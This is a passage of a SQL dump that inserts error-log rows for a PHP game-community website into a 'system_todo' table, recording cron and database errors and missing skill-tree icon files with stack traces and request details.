`time_closed`) VALUES (262, 'SYSTEM\\LOG\\ERROR', 'Given class is not a cronjob', 'bd1017ddb1f6e1508997a078d13202f5041c2908', 1, '/home/web/webdir/mojotrollz/system/cron/cron.php', 42, '#0 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_cron/saimod_sys_cron.php(10): SYSTEM\\CRON\\cron::next(\'\\\\SYSTEEM\\\\CRON\\\\\\\\\\\\crr)\n#1 [internal function]: SYSTEM\\SAI\\saimod_sys_cron::sai_mod__SYSTEM_SAI_saimod_sys_cron()\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'\\\\SYSTEEM\\\\SAI\\\\sssai.\',Array, 42, true, false)\n#4 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#5 {main}', '37.24.148.240', 0.076, '2014-11-27 13:37:39', 'mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_cron', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php?t=2_50500122511351_000000000000000_000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (263, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: Unknown column \'timestamp\' in \'field list\'', '4e3c2c7181f9524f0685ebdfad074fe5a66d3704', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(41): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT MONTH(ti...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT MONTH(ti...\')\n#2 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(26): SYSTEM\\DB\\QQ::QQ()\n#3 /home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php(9): SYSTEM\\DB\\QQ::Q1()\n#4 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#5 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#6 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#7 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#8 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#9 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#10 {main}', '37.24.148.240', 0.18801, '2014-11-27 13:38:35', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (264, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [month] => 12\n [year] => 2013\n)\n', 'af0197ef2be47e33f8045326c4633fdb75e3000d', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 10, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 20.12866, '2014-11-27 13:47:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (265, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => 11\n [1] => 14\n)\n', '79c6bc2a8e336c3a21104dcc3cb93a3a6d638feb', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 14, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 19.20463, '2014-11-27 13:55:43', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (266, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [month] => 12\n [year] => 2013\n)\n', 'af0197ef2be47e33f8045326c4633fdb75e3000d', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 15, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 19.21663, '2014-11-27 13:57:41', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (267, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => 11\n [1] => 2014\n)\n', 'd10c6adef19e05e39f3b144f149285bd33123be5', 1, '/home/web/webdir/mojotrollz/system/cron/cron_log2sqlite.php', 14, '#0 [internal function]: SYSTEM\\CRON\\cron_log2sqlite::run()\n#1 /home/web/webdir/mojotrollz/system/cron/cron.php(33): call_user_func(Array)\n#2 /home/web/webdir/mojotrollz/system/api/api_system.php(7): SYSTEM\\CRON\\cron::run()\n#3 [internal function]: SYSTEM\\API\\api_system::call_cron()\n#4 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#5 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEEM\\\\API\\\\vvver.\',\'api_mojotrollz\', Array)\n#6 {main}', '37.24.148.240', 20.68068, '2014-11-27 13:57:41', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=cron', 'a:0:{}', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (268, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_ambush.png\' found.', '131fb469813d7c0942988b3e64a834f63a0492ee', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_a...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_a...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.132, '2014-12-13 21:42:06', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_rogue_ambush.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 176, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (269, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_parry.png\' found.', 'd3d34d86bed50f6281eeb042bf1ca9e75b2c6bdf', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_parry.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_parry.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.004, '2014-12-13 21:42:05', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_parry.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 175, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (270, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_gouge.png\' found.', 'b9e024f1e52cea3113d330d1ff959e9aeef8e462', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_gouge.p...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_gouge.p...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.012, '2014-12-13 21:42:05', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_gouge.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 174, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (271, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_charge.png\' found.', '5849b438cf67cbb37f6d228593e36ce771398cef', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.028, '2014-12-13 21:42:05', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_charge.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 177, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (272, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_enchantarmor.png\' found.', '226b7607de2e1a22b68d9052300f5ca3ce228f96', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_en...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_en...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.008, '2014-12-13 21:42:05', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_enchantarmor.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 175, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (273, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_thunderclap.png\' found.', '7de3dca2b2ad7696046edae0744436bd749cb7cd', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_thunder...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_thunder...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.008, '2014-12-13 21:42:05', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_thunderclap.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 177, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (274, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_sword_05.png\' found.', '9541b8f07bb3201d1debfaa274eee93e1a229b35', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_sword_05.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_sword_05.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.004, '2014-12-13 21:42:05', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=inv_sword_05.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 173, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (275, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_backstab.png\' found.', 'f3c968d6d61ef387c40200733800adac03f0b9c9', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_backsta...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_backsta...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.012, '2014-12-13 21:42:05', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_backstab.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 177, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (276, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_axe_09.png\' found.', '7ad51de87bfcd3fe95587aa6dcc7070c9a19dbcb', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_axe_09.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_axe_09.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.008, '2014-12-13 21:42:05', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=inv_axe_09.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 173, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (277, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_searingarrow.png\' found.', '9c947d2e7d30305eb04968d8cc0e8fee9493e741', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_searing...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_searing...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.004, '2014-12-13 21:42:04', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_searingarrow.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 168, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (278, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_axe_06.png\' found.', '5ae5979b6848dacc40b421a9328b639462682cd3', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_axe_06.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_axe_06.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.012, '2014-12-13 21:42:04', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=inv_axe_06.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 171, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (279, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_slicedice.png\' found.', '97cd898fd76c9fa9c44c42e1295d3c92081d2035', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_s...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_s...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.004, '2014-12-13 21:42:04', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_rogue_slicedice.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 176, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (280, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_mace_01.png\' found.', 'caae2537ac6acdd1c24fec61e25e8f7383bdc984', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_mace_01.png\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_mace_01.png\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.028, '2014-12-13 21:42:04', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=inv_mace_01.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, b'0', 0, 178, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (281, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_sword_27.png\' found.', 'bfdfe08b5df2b79da7fce769e894d205a16e2cd6', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_sword_27.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_sword_27.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.012, '2014-12-13 21:42:04', 'mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=inv_sword_27.png', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B435', 13, 